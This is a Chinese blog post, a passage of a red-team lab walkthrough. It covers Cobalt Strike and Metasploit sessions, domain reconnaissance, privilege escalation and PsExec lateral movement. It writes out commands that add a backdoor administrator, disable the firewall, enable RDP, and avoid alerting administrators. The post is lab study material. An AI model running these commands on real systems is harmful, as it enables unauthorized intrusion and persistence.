
<!DOCTYPE html>
<html lang="en">


<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <meta name="theme-color" content="#202020"/>
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
  
  
    <meta name="keywords" content="内网渗透," />
  

  
    <meta name="description" content="红日靶场—ATT&amp;CK红队实战1" />
  
  
  <link rel="icon" type="image/x-icon" href="/logo.png">
  <title>红日靶场—ATT&amp;CK红队实战1 [ las ]</title>
  
    <!-- stylesheets list from config.yml -->
    
      <link rel="stylesheet" href="//cdn.bootcss.com/pure/1.0.0/pure-min.css">
    
      <link rel="stylesheet" href="/css/xoxo.css">
    
  
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <div class="nav-container">
    <nav class="home-menu pure-menu pure-menu-horizontal">
  <a class="pure-menu-heading" href="/">
    <img class="avatar" src="http://last-las.github.io/images/logo.png">
    <span class="title">las</span>
  </a>

  <ul class="pure-menu-list clearfix">
      
          
            <li class="pure-menu-item"><a href="/" class="pure-menu-link">Home</a></li>
          
      
          
            <li class="pure-menu-item"><a href="/archives" class="pure-menu-link">Archives</a></li>
          
      
          
            <li class="pure-menu-item"><a href="/tags" class="pure-menu-link">Tags</a></li>
          
      
          
            <li class="pure-menu-item"><a href="/categories" class="pure-menu-link">Categories</a></li>
          
      
          
            <li class="pure-menu-item"><a href="/about" class="pure-menu-link">About</a></li>
          
      
  </ul>
   
</nav>
  </div>

  <div class="container" id="content-outer">
    <div class="inner" id="content-inner">
      <div class="post-container">
  <article class="post" id="post">
    <header class="post-header text-center">
      <h1 class="title">
        红日靶场—ATT&amp;CK红队实战1
      </h1>
      <span>
        
        <time class="time" datetime="2020-10-06T09:37:23.000Z">
        2020-10-06
      </time>
        
      </span>
      <span class="slash">/</span>
      <span class="post-meta">
      <span class="post-tags">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" rel="tag">内网渗透</a></li></ul>
      </span>
    </span>
    </header>

    <div class="post-content">
      <h1 id="红队评估一"><a href="#红队评估一" class="headerlink" title="红队评估一"></a>红队评估一</h1><ul>
<li>kali linux：攻击机，CS服务器，同时物理机也作为攻击机<code>192.168.242.128</code></li>
<li>Windows 7：web服务器<code>192.168.52.143</code>，<code>192.168.242.129</code></li>
<li>Win2K3：域成员<code>192.168.52.141</code></li>
<li>Windows Server 2008：域控<code>192.168.52.138</code></li>
</ul>
<p>前期渗透阶段略。直接快进到getshell阶段。</p>
<h2 id="一-CS和MSF上线"><a href="#一-CS和MSF上线" class="headerlink" title="一 CS和MSF上线"></a>一 CS和MSF上线</h2><h3 id="1-CS上线"><a href="#1-CS上线" class="headerlink" title="1. CS上线"></a>1. CS上线</h3><p>首先将<code>cobaltstrike.jar</code>和<code>teamserver</code>上传到kali上：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005092909292.png" style="zoom:67%;" />

<p>运行服务器命令（<code>./teamserver [服务端真实IP] [密码]</code>）：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005093211977.png" alt="img"></p>
<p>客户端（物理机）连接：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005093311041.png" style="zoom:67%;" />

<p>添加监听器：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005093545666.png" style="zoom:67%;" />

<p>接下来要想CS上线可以生成exe或者一句话弹shell（其实并不是一句话，是服务端会起一个web服务），这里使用一句话：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005094214203.png" alt="image-20201005094214203"></p>
<h3 id="2-MSF上线"><a href="#2-MSF上线" class="headerlink" title="2. MSF上线"></a>2. MSF上线</h3><p>先生成payload：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005094431815.png"></p>
<p>将exe上传。接下来MSF需要监听相应端口：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005094740454.png" alt="img"></p>
<p>蚁剑执行<code>shell.exe</code>并且获得shell：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005094841814.png"></p>
<h3 id="3-CS派生MSF"><a href="#3-CS派生MSF" class="headerlink" title="3. CS派生MSF"></a>3. CS派生MSF</h3><p>首先CS创建一个<code>foreign</code>监听：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005101219532.png" style="zoom:50%;" />

<p>解析来在已有的会话上右键点击<code>spawn</code>：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005101446164.png" alt="spawn"></p>
<p>选择监听器：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005101501074.png" style="zoom:50%;" />

<p>别忘了MSF同时也要监听（要和CS中的一致）：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005101518955.png" alt="s" style="zoom:67%;" />

<p>获取到shell：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005101549290.png"></p>
<h3 id="4-MSF派生CS"><a href="#4-MSF派生CS" class="headerlink" title="4. MSF派生CS"></a>4. MSF派生CS</h3><p>首先CS创建一个监听：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005100230047.png" alt="image-20201005100230047" style="zoom:80%;" />

<p>接下来MSF根据已有的session来执行命令，将shell弹到CS上：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005100321078.png" alt="image-20201005100321078" style="zoom:67%;" />

<p>这里注意两点:</p>
<ul>
<li>选用的payload是<code>windows/meterpreter/reverse_http</code>，要和CS的选项保持一致</li>
<li>有一个操作是：<code>set DisableHandler true</code>，是因为我们是要把shell弹到CS上，而不是再添加一个session。如果不做这个操作，会在msf里生成一个新的session。</li>
</ul>
<blockquote>
<p>在查阅资料时康到的：</p>
<p>​        有什么需要派生shell的场景呢？首先CS虽然强大但用于攻击的载荷模块并不如MSF丰富，可参考的资料也较少，此时需要MSF接手shell继续进行后续渗透流程；其次CS的肉鸡类型主要支持Windows平台，payload也面向Windows，但通过派生shell我们可以使用MSF针对Linux的攻击载荷，获取Linux权限后接管到CS平台，从而拓展了团队协作渗透的广度与深度。</p>
<p>不过现在渗透经验缺乏，还是需要多接触才能体会。</p>
</blockquote>
<h2 id="二-信息收集"><a href="#二-信息收集" class="headerlink" title="二 信息收集"></a>二 信息收集</h2><h3 id="1-本机信息收集"><a href="#1-本机信息收集" class="headerlink" title="1.本机信息收集"></a>1.本机信息收集</h3><blockquote>
<p>当有乱码时，可以执行<code>chcp 65001</code>更换编码方式。</p>
</blockquote>
<ul>
<li><p>查看操作系统和版本信息：<code>systeminfo</code></p>
<p>重点关注三个地方</p>
<ul>
<li>OS Version</li>
<li>OS Name</li>
<li>Domain</li>
</ul>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005103708384.png" alt="image-20201005103708384" style="zoom:80%;" />
</li>
<li><p>查看本机的网络配置信息：<code>ipconfig /all</code></p>
<p>通过它首先可以判断服务器位于哪些网段，便于后面探测域内存活主机；</p>
<p>其次，也可根据它的信息进一步判断是否存在域：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005104114948.png" alt="image-20201005104114948" style="zoom:80%;" />
</li>
<li><p>查询路由表和arp缓存：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">route print</span><br><span class="line">arp -a</span><br></pre></td></tr></table></figure>
</li>
<li><p>查看本机有哪些进程，以便判断是否有360等：<code>tasklist</code></p>
</li>
<li><p>查看主机的开机时间：<code>net statistics workstation</code>：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005104338854.png" alt="image-20201005104338854" style="zoom:80%;" />
</li>
<li><p>查询用户列表：<code>net user</code></p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005104630096.png" alt="image-20201005104630096" style="zoom:80%;" />
</li>
<li><p>查询本地管理员组的成员：<code>net localgroup administrators</code>，如果有<code>Domain Admins</code>组被添加说明确实存在域：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005104733459.png" alt="image-20201005104733459" style="zoom:80%;" />
</li>
<li><p>查看防火墙配置：<code>netsh firewall show config</code>：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005105621122.png" alt="image-20201005105621122" style="zoom:80%;" />



</li>
</ul>
<p>同时可以使用该链接中的脚本进行自动化的信息收集：<a target="_blank" rel="noopener" href="http://www.fuzzysecurity.com/scripts/files/wmic_info.rar%EF%BC%9A">http://www.fuzzysecurity.com/scripts/files/wmic_info.rar：</a></p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005105958631.png" alt="image-20201005105958631" style="zoom:67%;" />



<h3 id="2-查询当前权限"><a href="#2-查询当前权限" class="headerlink" title="2.查询当前权限"></a>2.查询当前权限</h3><ul>
<li><p>查看当前权限<code>whoami</code></p>
<p>如果是本地的管理员权限可以直接提升为System权限（见后面）。</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005110141838.png" alt="image-20201005110141838" style="zoom:70%;" />
</li>
<li><p><code>net user xxx /domain</code></p>
<p>获取到shell时，有可能拿到的是一个域内用户，如这个靶机上的：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005111810608.png" alt="image-20201005111810608"></p>
<p>那么此时我们可能想要去查看它的相应权限，就可以通过这个命令：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005111850977.png" alt="image-20201005111850977" style="zoom:80%;" />

<p>可以发现，该用户是本地的管理员，也是域内的管理员。</p>
</li>
</ul>
<h3 id="3-看是否存在域"><a href="#3-看是否存在域" class="headerlink" title="3.看是否存在域"></a>3.看是否存在域</h3><blockquote>
<p>判断是否存在域以及查找域控。</p>
</blockquote>
<p>其实前面的很多操作已经可以判断是否存在域了。这里再归纳一次。</p>
<ul>
<li><p><code>ipconfig /all</code>：</p>
<p>通过该命令获取到主域名和DNS服务器的IP，一般来说DNS服务器就是域控。</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005112222759.png" alt="image-20201005112222759" style="zoom:80%;" />

<p>可以使用<code>nslookup</code>来查询域名的ip地址是否和DNS服务器是同一个，这里我的环境干不了：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005113108418.png" alt="image-20201005113108418" style="zoom:80%;" />

<p>也可以直接用ping：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005112527486.png" alt="image-20201005112527486" style="zoom:80%;" />

<p>可以发现确实是同一台机器。</p>
</li>
<li><p><code>systeminfo</code>，只能判断是否存在域。如果“域”字段为“workgroup”则不在域内。</p>
</li>
<li><p><code>net config workstation</code>，也只能判断是否存在域。如果“工作站域DNS名称”为<strong>WORKGROUP</strong>表示非域：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005112956901.png" alt="image-20201005112956901" style="zoom:80%;" />
</li>
<li><p><code>net time /domain</code>，能看是否存在域以及域控的机器名称。因为一般的时间服务器也就是域控。</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005113303516.png" alt="image-20201005113303516"></p>
</li>
<li><p><code>net group &quot;domain controllers&quot; /domain</code>，必须是域用户才能执行该命令（后面会看到）：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005153113955.png" alt="image-20201005153113955" style="zoom:80%;" />



</li>
</ul>
<h3 id="4-探测域内主机"><a href="#4-探测域内主机" class="headerlink" title="4.探测域内主机"></a>4.探测域内主机</h3><blockquote>
<p>探测域内主机主要可以通过下面三个协议。</p>
<p>此处参考链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/-mo-/p/11908260.html">https://www.cnblogs.com/-mo-/p/11908260.html</a></p>
</blockquote>
<h4 id="NetBIOS"><a href="#NetBIOS" class="headerlink" title="NetBIOS"></a>NetBIOS</h4><ul>
<li><p>MSF</p>
<p>在真实环境里，首先要添加路由，再使用其<strong>NetBIOS</strong>模块。</p>
<p>首先ipconfig查看内网段：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005115011452.png" alt="image-20201005115011452" style="zoom:80%;" />

<p>添加路由：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005115146529.png" alt="image-20201005115146529" style="zoom:70%;" />

<p>接下来保存session并且使用NetBIOS模块进行扫描，扫描结果如下：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005115604779.png" alt="image-20201005115604779" style="zoom:80%;" />
</li>
<li><p>上传工具<strong>nbtscan.exe</strong>进行扫描（也有linux下的工具咯）：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005120141434.png" alt="image-20201005120141434"></p>
</li>
<li><p>使用nmap，但是如果不是物理的在人家内网里面一般用不到吧？</p>
<p>这里就在我本机的NAT网卡下进行测试了。</p>
<p>命令：<code>nmap -sU --script nbstat.nse -p137 192.168.242.0/24 -T4</code></p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005120256466.png" alt="image-20201005120256466" style="zoom:80%;" />

</li>
</ul>
<h4 id="ICMP"><a href="#ICMP" class="headerlink" title="ICMP"></a>ICMP</h4><ul>
<li><p>Windows命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;L %I in (1,1,255) do ping -w 1 -n 1 192.168.52.%I | findstr &quot;TTL&quot; &gt;&gt; ans.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005120835996.png" alt="image-20201005120835996"></p>
</li>
</ul>
<h4 id="ARP"><a href="#ARP" class="headerlink" title="ARP"></a>ARP</h4><ul>
<li><p>nmap：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sn -PR 192.168.142.1/24</span><br></pre></td></tr></table></figure>
</li>
<li><p>msf</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 测试的时候不太好用怎末肥事</span></span><br><span class="line">use auxiliary/scanner/discovery/arp_sweep</span><br></pre></td></tr></table></figure>
</li>
<li><p>直接命令看</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> windows和Linux下通用</span></span><br><span class="line">arp -a</span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005144641895.png" alt="image-20201005144641895" style="zoom:65%;" />
</li>
<li><p>是windows下可以上传工具<code>arp-scan</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan.exe -t 192.168.52.0&#x2F;24</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005144810873.png" alt="image-20201005144810873"></p>
</li>
</ul>
<h4 id="TCP-UDP"><a href="#TCP-UDP" class="headerlink" title="TCP/UDP"></a>TCP/UDP</h4><ul>
<li><p>Windows下使用<code>scanline</code>，需要上传使用咯：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sl.exe -h -t 22,80-89,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O log.txt -p 192.168.52.1-254</span><br></pre></td></tr></table></figure>

<p>结果：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005143230609.png" alt="image-20201005143230609" style="zoom:80%;" />
</li>
<li><p>Linux下大概只能通过代理使用nmap了叭：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kali@kali~$ nmap -sP 192.168.242.0/24</span><br><span class="line"><span class="comment"># then nmap -sS (-p-) 192.168.242.1</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
<h3 id="5-扫描域内端口"><a href="#5-扫描域内端口" class="headerlink" title="5.扫描域内端口"></a>5.扫描域内端口</h3><ul>
<li><p>nmap：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash"> 这里由于不方便用nmap所以没有扫描靶机而是我的物理机ip。</span></span><br><span class="line">nmap -sS 192.168.242.1</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005151248288.png" alt="image-20201005151248288"></p>
</li>
<li><p>御剑高速TCP端口扫描工具（走代理）</p>
</li>
<li><p>scaneline</p>
</li>
<li><p>MSF：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary&#x2F;scanner&#x2F;portscan&#x2F;tcp</span><br></pre></td></tr></table></figure>

<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005151525416.png" alt="image-20201005151525416" style="zoom:80%;" />



</li>
</ul>
<h3 id="6-域内信息收集"><a href="#6-域内信息收集" class="headerlink" title="6.域内信息收集"></a>6.域内信息收集</h3><ol>
<li><p>查询有哪些域：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net view &#x2F;domain</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005152311089.png" alt="image-20201005152311089"></p>
</li>
<li><p>查询域内有哪些计算机：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 不包括自己</span></span><br><span class="line">net view /domain:GOD</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005152327556.png" alt="image-20201005152327556"></p>
</li>
<li><p>查询域内的用户组：</p>
<p>默认情况下，<code>Domain Admins</code>和<code>Enterprise Admins</code>对域内所有域控制器有完全控制权限。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net group &#x2F;domain</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005152647214.png" alt="image-20201005152647214"></p>
</li>
<li><p>查询某个组的成员：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net group &quot;Domain Admins&quot; &#x2F;domain</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005153301734.png"></p>
</li>
<li><p>查询域内的用户列表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user &#x2F;domain</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005153708565.png"></p>
</li>
</ol>
<h3 id="7-定位域管理员"><a href="#7-定位域管理员" class="headerlink" title="7.定位域管理员"></a>7.定位域管理员</h3><blockquote>
<p>其它工具还没试过。。</p>
</blockquote>
<ul>
<li><p><code>psloggedon</code> 好用的一匹。</p>
<p>一般只执行<code>psloggedon</code>会输出本机的相关登录信息：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005155351660.png"></p>
<p>执行<code>psloggedon \\computername</code>可以查看哪些用户登录了哪个机器：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005155322941.png"></p>
</li>
</ul>
<h3 id="8-查找域管进程"><a href="#8-查找域管进程" class="headerlink" title="8.查找域管进程"></a>8.查找域管进程</h3><p>还不咋懂这一节的操作，先咕咕掉。</p>
<h2 id="插曲-杂种操作"><a href="#插曲-杂种操作" class="headerlink" title="插曲 [杂种操作]"></a>插曲 [杂种操作]</h2><h3 id="kill-explorer-exe"><a href="#kill-explorer-exe" class="headerlink" title="kill explorer.exe"></a>kill explorer.exe</h3><p>应急演练的时候杰哥干过的傻吊操作：<code>taskkill /F /pid &#123;pid&#125;</code>，然后pid是explorer.exe进程。之后就变成了这样：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005160757206.png" alt="img"></p>
<p>然后桌面就消失了，惊动了管理员大概。。</p>
<h3 id="关于防火墙"><a href="#关于防火墙" class="headerlink" title="关于防火墙"></a>关于防火墙</h3><p>如果直接去关闭防火墙的话：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall set allprofiles state off</span><br></pre></td></tr></table></figure>

<p>会有很明显的提示：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005162237212.png" style="zoom:50%;" />

<p>所以可以采取下面这种方式。</p>
<p>首先创建一个管理员账户：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user las 0xDktb123 &#x2F;add</span><br><span class="line">net localgroup administrators las &#x2F;add</span><br></pre></td></tr></table></figure>

<p>开启远程桌面：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 00000000 &#x2F;f</span><br></pre></td></tr></table></figure>

<p>防火墙中增加放行策略：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name&#x3D;&quot;Remote Desktop&quot; protocol&#x3D;TCP dir&#x3D;in localport&#x3D;3389 action&#x3D;allow</span><br></pre></td></tr></table></figure>

<p>这样在登录之前是没有右下角的提示的。</p>
<p>但是！！</p>
<p>当你开始登录的时候，会提示：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005164315386.png" style="zoom:67%;" />

<p>这时管理员会这样显示：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201005164444158.png" style="zoom:50%;" />

<p>所以只要登录了最终都是会惊动管理员的。。</p>
<h2 id="三-权限提升"><a href="#三-权限提升" class="headerlink" title="三 权限提升"></a>三 权限提升</h2><blockquote>
<p>这里权限提升的部分原理还没看到，暂时就留下msf和cs的操作方法。</p>
<p>在windows下，administrator并不是最高权限，system才是。因此还是存在提权场景。</p>
</blockquote>
<ul>
<li><p><strong>msf提升权限至system</strong><br><code>getsystem -t 0</code>。</p>
<p>使用<code>getsystem -h </code>查看帮助：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007101114752.png" style="zoom:67%;" />
</li>
<li><p><strong>CS提升权限至system</strong></p>
<p>直接康图：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007101735281.png" style="zoom:50%;" />

<p>选择监听器：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007101802453.png"></p>
<p>获得system的反弹shell：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007101820410.png"></p>
</li>
</ul>
<h2 id="四-横向移动"><a href="#四-横向移动" class="headerlink" title="四 横向移动"></a>四 横向移动</h2><h3 id="1-IPC-SMB-PsExec"><a href="#1-IPC-SMB-PsExec" class="headerlink" title="1.IPC+SMB+PsExec"></a>1.IPC+SMB+PsExec</h3><blockquote>
<p>参考链接：</p>
<ul>
<li>CS 4.0 SMB Beacon：<a target="_blank" rel="noopener" href="http://blog.leanote.com/post/snowming/8b7ce0f84c03">http://blog.leanote.com/post/snowming/8b7ce0f84c03</a></li>
<li>SMB协议介绍：<a target="_blank" rel="noopener" href="https://developer.aliyun.com/article/675647">https://developer.aliyun.com/article/675647</a></li>
<li>深入了解PsExec：<a target="_blank" rel="noopener" href="https://rcoil.me/2019/08/%E3%80%90%E7%9F%A5%E8%AF%86%E5%9B%9E%E9%A1%BE%E3%80%91%E6%B7%B1%E5%85%A5%E4%BA%86%E8%A7%A3%20PsExec/">https://rcoil.me/2019/08/%E3%80%90%E7%9F%A5%E8%AF%86%E5%9B%9E%E9%A1%BE%E3%80%91%E6%B7%B1%E5%85%A5%E4%BA%86%E8%A7%A3%20PsExec/</a></li>
<li>《内网安全攻防》</li>
</ul>
</blockquote>
<h4 id="概念介绍"><a href="#概念介绍" class="headerlink" title="概念介绍"></a>概念介绍</h4><ol>
<li><p>**IPC(Internet Process Connection)**本意是进程间通信，这里特指windows下通过开启139、445端口来实现不同主机之间的远程登录和对默认资源的访问。它是通过一个命名管道来实现的。</p>
<p>在具体使用的时候，IPC通过验证用户名和密码使得主机获得相应的权限和连接，利用该连接可以访问文件，执行命令等：</p>
<p>建立一个ipc$：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\<span class="number">192.168</span>.<span class="number">52.141</span>\ipc<span class="variable">$</span> /user:<span class="string">&quot;administrator&quot;</span> <span class="string">&quot;123456&quot;</span></span><br></pre></td></tr></table></figure>

<p>执行<code>net use</code>查看已经建立的连接：</p>
<p><img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007103600556.png"></p>
<blockquote>
<p>有的博客上面建立ipc时用的是**admin$**，似乎没有什么区别。。</p>
<p>目前知道的是：**admin$**是共享命名管道里的一个系统默认，它的默认路径是<code>c:\windows\</code>；</p>
<p>IPC$是系统默认共享的统称，Admin$是系统默认共享的一种。</p>
</blockquote>
</li>
<li><p><strong>SMB</strong></p>
<p>SMB网络文件系统协议，全名服务器消息块（Server Message Block）。</p>
<p>需要开启的端口是139，445（139端口是在NBT协议基础上的；445端口不需要）。</p>
<p>协议的流程：</p>
<ol>
<li><p>SMB协议协商</p>
<p>在一个SMB还没有开始的时候，由客户端率先发出一个协商请求。在请求中，客户端会列出所有它所支持协议版本以及所支持的一些特性（比如加密Encryption、持久句柄Persistent Handle、客户端缓存Leasing等等）。而服务端在回复中则会指定一个SMB版本且列出客户端与服务端共同支持的特性。</p>
</li>
<li><p>建立SMB会话</p>
<p>客户端选择一个服务端支持的协议来进行用户认证，可以选择的认证协议一般包括NTLM、Kerberos等。按照选择的认证协议的不同，这个阶段可能会进行一次或多次SESSION_SETOP请求/回复的网络包交换。至于NTLM或Kerberos认证协议的细节，我们会另文再叙。</p>
</li>
<li><p>连接一个文件共享</p>
<p>在会话建立之后，客户端会发出连接文件分享的请求。源于文件系统的树形结构，该请求被命名为树连接（Tree Connect）。以SMB协议的阿里云NAS为例，一般的SMB挂载命令为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use z: \\xxx.nas.aliyuncs.com\myshare</span><br></pre></td></tr></table></figure>

<p>其中的“ \XXX.nas.aliyuncs.com\myshare”便是我们将要连接的那个文件分享，也便是那棵“树”。如果在“myshare”中创建有子目录“abc”，那直接连接“abc”这棵子树也是可以的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use z: \\XXX.nas.aliyuncs.com\myshare\abc</span><br></pre></td></tr></table></figure>
</li>
<li><p>文件系统操作</p>
<p>在文件分享连接成功之后，用户通过SMB客户端进行真正的对于目标文件分享的业务操作。这个阶段可以用到的指令有CREATE、CLOSE、FLUSH、READ、WRITE、SETINFO、GETINFO等等。</p>
</li>
<li><p>断开文件分享连接</p>
<p>当一个SMB会话被闲置一定时间之后，Windows会自动断开文件分享连接并随后中止SMB会话。这个闲置时间可以通过Windows注册表进行设定[<a target="_blank" rel="noopener" href="https://blogs.msdn.microsoft.com/openspecification/2013/03/27/smb-2-x-and-smb-3-0-timeouts-in-windows/">9</a>]。当然，用户也可以主动发起断开连接请求。</p>
</li>
<li><p>终止SMB会话</p>
<p>当客户端发出会话中止请求并得到服务端发回的中止成功的回复之后，这个SMB会话至此便正式结束了。</p>
</li>
</ol>
</li>
<li><p><strong>PsExec</strong></p>
<p>起初<code>PsExec</code>旨在作为系统管理员的便利工具，以便他们可以通过在远程主机上运行命令来执行维护任务。</p>
<p>它是通过SMB协议来执行的，因此远程机器必须要开启139和445端口，其它需要满足的条件见参考链接咯。</p>
<p>当满足条件后，可以使用PsExec来执行远程命令：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psexec \\hostIp <span class="literal">-u</span> [<span class="type">username</span>] <span class="literal">-p</span> [<span class="type">password</span>] cmd</span><br></pre></td></tr></table></figure>

<p>这里在windows7的靶机上执行psexec：</p>
<img src="https://gitee.com/Lieutenantas/md-pic/raw/master/image-20201007112739346.png" style="zoom:67%;" />

<p>psexec的执行流程：</p>
<ol>
<li>将<code>PSEXESVC.exe</code>上传到<code>ADMIN$</code>(执行/admin$/system32/PSEXESVC.EXE)共享文件夹内</li>
